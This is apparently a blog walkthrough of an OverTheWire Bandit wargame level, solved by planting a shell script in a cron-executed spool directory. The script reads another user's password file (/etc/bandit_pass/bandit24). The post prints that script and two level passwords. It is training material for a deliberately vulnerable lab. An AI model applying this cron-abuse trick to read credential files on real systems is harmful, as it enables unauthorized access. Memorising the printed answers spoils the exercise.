Level Goal
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.Commands you may need to solve this level
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around...
cron, crontab, crontab(5) (use "man 5 crontab" to access this)Solution:
- [Comment] Using SSH to connect the server
- sp@simple-plan:~|=> ssh bandit23@bandit.labs.overthewire.org
...
bandit23@bandit.labs.overthewire.org's password: jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n - [Comment] Using cd command to change the shell working directory
- bandit23@melinda:~$ cd /etc/cron.d
- [Comment] Using ls command to list directory contents
- bandit23@melinda:/etc/cron.d$ ls
boobiesbot-check cronjob_bandit24 manpage3_resetpw_job natas26_cleanup semtex0-ppc semtex6 vortex0 cron-apt eloi0 natas-session-toucher php5 semtex10 semtex8 vortex20 cronjob_bandit22 eloi1 natas-stats semtex0-32 semtex12 semtex9 vulnbot0-check cronjob_bandit23 hintbot-check natas25_cleanup semtex0-64 semtex5 sysstat vulnbot1-check - [Comment] Using cat command to output file's contents
- bandit23@melinda:/etc/cron.d$ cat cronjob_bandit24
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null - [Comment] Using cat command to check the script content
- bandit23@melinda:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash myname=$(whoami) cd /var/spool/$myname echo "Executing and deleting all scripts in /var/spool/$myname:" for i in *; do echo "Handling $i" ./$i rm -f $i done - [Comment] Now, we know that all the scripts in /var/spool/bandit24 will be executed once and then removed immediately
- [Comment] Create a temporary directory
- bandit23@melinda:/var/spool/bandit24$ mkdir -p /tmp/level24
- bandit23@melinda:/var/spool/bandit24$ cd /tmp/level24
- [Comment] Create our script to fetch out the passowd for next level and store it in the temporary directory
- bandit23@melinda:/tmp/level24$ vim sp.sh
#!/bin/sh cat /etc/bandit_pass/bandit24 >> /tmp/level24/bandit24 touch /tmp/level24/ok
- [Comment] Change the privileges
- bandit23@melinda:/tmp/level24$ chmod 777 sp.sh
- [Comment] Copy our script to /var/spool/bandit24/, and it would be executed in a minute
- bandit23@melinda:/tmp/level24$ cp sp.sh /var/spool/bandit24/
- bandit23@melinda:/tmp/level24$ ls
bandit24 ok sp.sh - [Comment] Using cat command to fetch out the password
- bandit23@melinda:/tmp/level24$ cat bandit24
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ - [Comment] Using exit command to disconnect connection to server
- bandit23@melinda:/etc/cron.d$ exit
logout
Connection to bandit.labs.overthewire.org closed. - [Comment] It's done! Saving the password for next level.
This comment has been removed by the author.
ReplyDeleteThis comment has been removed by the author.
Deletehow the script cronjob_bandit24.sh read files inside bandit24
ReplyDelete